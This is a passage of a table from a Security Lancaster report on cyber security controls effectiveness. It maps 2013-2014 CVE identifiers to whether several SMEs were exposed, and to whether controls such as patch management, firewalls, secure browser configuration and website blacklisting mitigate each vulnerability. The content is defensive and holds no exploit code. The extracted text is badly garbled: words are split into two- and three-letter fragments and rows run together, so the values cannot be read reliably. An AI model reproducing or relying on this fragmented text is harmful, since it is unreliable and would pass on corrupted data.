3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
